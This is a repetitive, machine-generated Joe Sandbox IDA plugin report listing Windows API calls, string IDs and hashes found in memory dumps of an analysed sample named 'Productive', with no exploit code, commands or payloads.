                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                • String ID: %lu
                                                                                                                                                                • API String ID: 2507767853-685833217
                                                                                                                                                                • Opcode ID: dc775e623e2bde6e8dea9e5b874e5d31d8ad5971585629eee3bf623f49a9bb81
                                                                                                                                                                • Instruction ID: 9081774f5737ce98fcf808be2f09f95906999b7ab23b6e57bd9bdc460457869a
                                                                                                                                                                • Opcode Fuzzy Hash: dc775e623e2bde6e8dea9e5b874e5d31d8ad5971585629eee3bf623f49a9bb81
                                                                                                                                                                • Instruction Fuzzy Hash: 7121A135A00108AFCB15EF65C885DEEB7B8EF49704F004069F905DB292DB71EA55CF61
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0030AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0030AA6F
                                                                                                                                                                  • Part of subcall function 0030AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0030AA82
                                                                                                                                                                  • Part of subcall function 0030AA52: GetCurrentThreadId.KERNEL32 ref: 0030AA89
                                                                                                                                                                  • Part of subcall function 0030AA52: AttachThreadInput.USER32(00000000), ref: 0030AA90
                                                                                                                                                                • GetFocus.USER32 ref: 0030AC2A
                                                                                                                                                                  • Part of subcall function 0030AA9B: GetParent.USER32(?), ref: 0030AAA9
                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0030AC73
                                                                                                                                                                • EnumChildWindows.USER32(?,0030ACEB), ref: 0030AC9B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
                                                                                                                                                                • String ID: %s%d
                                                                                                                                                                • API String ID: 2776554818-1110647743
                                                                                                                                                                • Opcode ID: 3db809d00c6680d41faeb83cacb66e3a114aa26c14de8740f1effb827dd7ceaa
                                                                                                                                                                • Instruction ID: 5def2e855ab251400cecbdf3eaee5027481326336e2e68b4a1081aa5875f5a13
                                                                                                                                                                • Opcode Fuzzy Hash: 3db809d00c6680d41faeb83cacb66e3a114aa26c14de8740f1effb827dd7ceaa
                                                                                                                                                                • Instruction Fuzzy Hash: 6511DF75201304ABEF12BFA0ED96FEA376CAB45300F004079FE08AE1C2CA7069559B72
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00337D97
                                                                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00337DAC
                                                                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00337DB9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                • String ID: msctls_trackbar32
                                                                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                                                                • Opcode ID: a215aeb5f211a2f511fb8006a86f2cc31dc02cc58d783661d6afef744d78b73b
                                                                                                                                                                • Instruction ID: 5847c056648a3a174df25ce0c7a6c0eed01e02c8123cef0a792ebf4dd3a7d5c6
                                                                                                                                                                • Opcode Fuzzy Hash: a215aeb5f211a2f511fb8006a86f2cc31dc02cc58d783661d6afef744d78b73b
                                                                                                                                                                • Instruction Fuzzy Hash: C01136B2204249BEDF259F64CC85FEB77ADEF88B54F124128FB45A60A0C671E850CB20
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002D0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002EB520,?,?,?,002B100A), ref: 002D0B79
                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,002B100A), ref: 002EB524
                                                                                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,002B100A), ref: 002EB533
                                                                                                                                                                Strings
                                                                                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002EB52E
                                                                                                                                                                • =5, xrefs: 002EB514
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=5
                                                                                                                                                                • API String ID: 55579361-2717996854
                                                                                                                                                                • Opcode ID: 8f12c9866d7dca34d09d2dba1d1ba68c7b92146f204cfaeb7893be944b05195d
                                                                                                                                                                • Instruction ID: a6b9234cdba0d28fac8cf70c0b82f36acee5ed003c7d4782dfeccb528e0afc7f
                                                                                                                                                                • Opcode Fuzzy Hash: 8f12c9866d7dca34d09d2dba1d1ba68c7b92146f204cfaeb7893be944b05195d
                                                                                                                                                                • Instruction Fuzzy Hash: 3BE06D742107518BD332AF26E404B437AF4AF04745F40891EE856C6751EBB4E558CB91
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,002D32DA,002D1003,?,002D9EEE,000000FF,0000001E,0036CE28,00000008,002D9E52,002D1003,002D1003), ref: 002D32AA
                                                                                                                                                                • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 002D32BC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                • API String ID: 1646373207-1276376045
                                                                                                                                                                • Opcode ID: 6a33d5fa3b1b0c8b6063dcd77645168e66d884258fdc1e791cf6ff508d99c229
                                                                                                                                                                • Instruction ID: 973ca873418bf067585d787252f2b8e9dc579e32f7f62d67cdff927a565ef392
                                                                                                                                                                • Opcode Fuzzy Hash: 6a33d5fa3b1b0c8b6063dcd77645168e66d884258fdc1e791cf6ff508d99c229
                                                                                                                                                                • Instruction Fuzzy Hash: 3BD01234B54209BBDB129FA1DD0ABAD7AACFF01B51F000165FD08E5160DB71AF209A51
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,002F027A,?), ref: 0032C6E7
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0032C6F9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                • API String ID: 2574300362-1816364905
                                                                                                                                                                • Opcode ID: 0ad37397b758764f49f1c7030275cf772b893f5acdb026a10ea171d4fd7f30a1
                                                                                                                                                                • Instruction ID: 6b7c29162632cc3e685e23d14b5877d9ef9577655096bdd594bfc74c347e279b
                                                                                                                                                                • Opcode Fuzzy Hash: 0ad37397b758764f49f1c7030275cf772b893f5acdb026a10ea171d4fd7f30a1
                                                                                                                                                                • Instruction Fuzzy Hash: B3E0C27C2303228FD7235B2ADC48A9A76D8FF15304F809429E9C5D6220DB70E880CF10
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,002C4B44,?,002C49D4,?,?,002C27AF,?,00000001), ref: 002C4B85
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 002C4B97
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                • API String ID: 2574300362-3689287502
                                                                                                                                                                • Opcode ID: 7682b23f43b224150d94b33db34247eb0fcb9a225bad9132b1729b3b787cceea
                                                                                                                                                                • Instruction ID: 4f321f5d1b20eeaafffdf0a9a4fde4631eb76dd2acd928c45a662b510c8ea404
                                                                                                                                                                • Opcode Fuzzy Hash: 7682b23f43b224150d94b33db34247eb0fcb9a225bad9132b1729b3b787cceea
                                                                                                                                                                • Instruction Fuzzy Hash: D2D01278A607138FD7255F31DC18B4676E8AF05355F51C82ED5C6EA550DB70E880CA10
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,002C4AF7,?), ref: 002C4BB8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 002C4BCA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                • API String ID: 2574300362-1355242751
                                                                                                                                                                • Opcode ID: f001418fe588d133a56410bf1f4939a6f22700d1d55536005dbda59dc329f280
                                                                                                                                                                • Instruction ID: 79d3801a9b2053741e70b215696940645ca6db5140ef395742bcdf0249fbc762
                                                                                                                                                                • Opcode Fuzzy Hash: f001418fe588d133a56410bf1f4939a6f22700d1d55536005dbda59dc329f280
                                                                                                                                                                • Instruction Fuzzy Hash: 28D0C278A203138FD3215F30DC08B4772D8AF01344F00CC2DD4C2DA558DB70E890CA00
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00331696), ref: 00331455
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00331467
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                • API String ID: 2574300362-4033151799
                                                                                                                                                                • Opcode ID: df04c479cff0734efe4c0bbea65a0b111d2e7e766a8ac8377d1f3d2a4795d5a8
                                                                                                                                                                • Instruction ID: b1c82b428e3a979d57bb92bf852ec31d08842d6f3953a334e857a4e535d4ed59
                                                                                                                                                                • Opcode Fuzzy Hash: df04c479cff0734efe4c0bbea65a0b111d2e7e766a8ac8377d1f3d2a4795d5a8
                                                                                                                                                                • Instruction Fuzzy Hash: 17D012756207128FD7225F76C84865676E8AF07395F11C82AE4E6D6150DA70E4C0CA10
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,002C5E3D), ref: 002C55FE
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 002C5610
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                • API String ID: 2574300362-192647395
                                                                                                                                                                • Opcode ID: 8ee02f391a03797d873b5b5254d3bbcdef9188a158ae998fad214e60caa778d6
                                                                                                                                                                • Instruction ID: e178ba26a705e754caf42f6ab02fbc7692b4d81675d822934e8839a90c65b856
                                                                                                                                                                • Opcode Fuzzy Hash: 8ee02f391a03797d873b5b5254d3bbcdef9188a158ae998fad214e60caa778d6
                                                                                                                                                                • Instruction Fuzzy Hash: E9D01278A307238FE7255F31CC0865776D8AF05355F11882DD5C6DA161DB70E4C0CA50
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,003293DE,?,00340980), ref: 003297D8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003297EA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                • API String ID: 2574300362-199464113
                                                                                                                                                                • Opcode ID: c205ed83da785e13f02b5909bb70c46d4411cbddf7b18b14110f7ba1e8f6e355
                                                                                                                                                                • Instruction ID: 567acb9455630cddff935f4056e90296ec9a743e11044c0c0d9f477013a16a84
                                                                                                                                                                • Opcode Fuzzy Hash: c205ed83da785e13f02b5909bb70c46d4411cbddf7b18b14110f7ba1e8f6e355
                                                                                                                                                                • Instruction Fuzzy Hash: 0AD012786207238FD7265F35E888646B6D8AF05391F11C82AD5D6E6160DF74D480CE11
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2d453e48ce2bc010edb2e7d3703792a29797a28c930ce34fb6cae7272aa4d8a0
                                                                                                                                                                • Instruction ID: 8509bf40306d9a7c8c71da8ea8b430af04b4378ba74c248dc9caa8e4cdf6c314
                                                                                                                                                                • Opcode Fuzzy Hash: 2d453e48ce2bc010edb2e7d3703792a29797a28c930ce34fb6cae7272aa4d8a0
                                                                                                                                                                • Instruction Fuzzy Hash: F5C19E74E01216EFCB15CF98C894EAEB7B9FF48314B118598E845EB291DB31ED81CB90
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 003287AD
                                                                                                                                                                • CoUninitialize.OLE32 ref: 003287B8
                                                                                                                                                                  • Part of subcall function 0033DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00328A0E,?,00000000), ref: 0033DF71
                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 003287C3
                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00328A94
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 780911581-0
                                                                                                                                                                • Opcode ID: 7a940e9fcab06b036ccbbab1caa3af33f37e1c7c370d116ec0822c6149c1f689
                                                                                                                                                                • Instruction ID: cc2ee9b2ac5baeeae4295bf6a7c6189424cc0cf4bb21fe641be436b50e9bf52c
                                                                                                                                                                • Opcode Fuzzy Hash: 7a940e9fcab06b036ccbbab1caa3af33f37e1c7c370d116ec0822c6149c1f689
                                                                                                                                                                • Instruction Fuzzy Hash: FBA16975214B129FD701EF14D481B6AB7E4BF88354F148849F99A9B3A2CB30ED40CF92
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002D9E3B: EnterCriticalSection.KERNEL32(002D1003,?,002D9CAC,0000000D), ref: 002D9E66
                                                                                                                                                                • GetStartupInfoW.KERNEL32(?,0036CF10,00000064,002D7F17,0036CD38,00000014), ref: 002DD895
                                                                                                                                                                • GetFileType.KERNEL32(00000001), ref: 002DD929
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalEnterFileInfoSectionStartupType
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4158522439-0
                                                                                                                                                                • Opcode ID: ea43132d86b08e2bb671c0d8ab0287a486fca0c3777948c91dc1457741e27dd0
                                                                                                                                                                • Instruction ID: de621e8a31712e99b2c43156c2f34ec308699a1527463b91bc119ebbeda8ccde
                                                                                                                                                                • Opcode Fuzzy Hash: ea43132d86b08e2bb671c0d8ab0287a486fca0c3777948c91dc1457741e27dd0
                                                                                                                                                                • Instruction Fuzzy Hash: 0C81F571924B469FCB24CF68C8415A9BBF4AF0A324F24826FD0A6AB391D7359C52CF10
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2808897238-0
                                                                                                                                                                • Opcode ID: 65a00ec45b54c6f7b69c75fe0a0d14b8bfaea90806eae95a814daee01be96fd8
                                                                                                                                                                • Instruction ID: b3d62db0a7acb897ef14fd1c3f5ab7cbfb6e0d5363681cd22a4919b190c646b4
                                                                                                                                                                • Opcode Fuzzy Hash: 65a00ec45b54c6f7b69c75fe0a0d14b8bfaea90806eae95a814daee01be96fd8
                                                                                                                                                                • Instruction Fuzzy Hash: 7051D530A197059ACB25AF7998A5B7EB3E8AF05310F30881FE547CB6E1DB31B8508B01
                                                                                                                                                                APIs
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0032F526
                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0032F534
                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0032F5F4
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0032F603
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
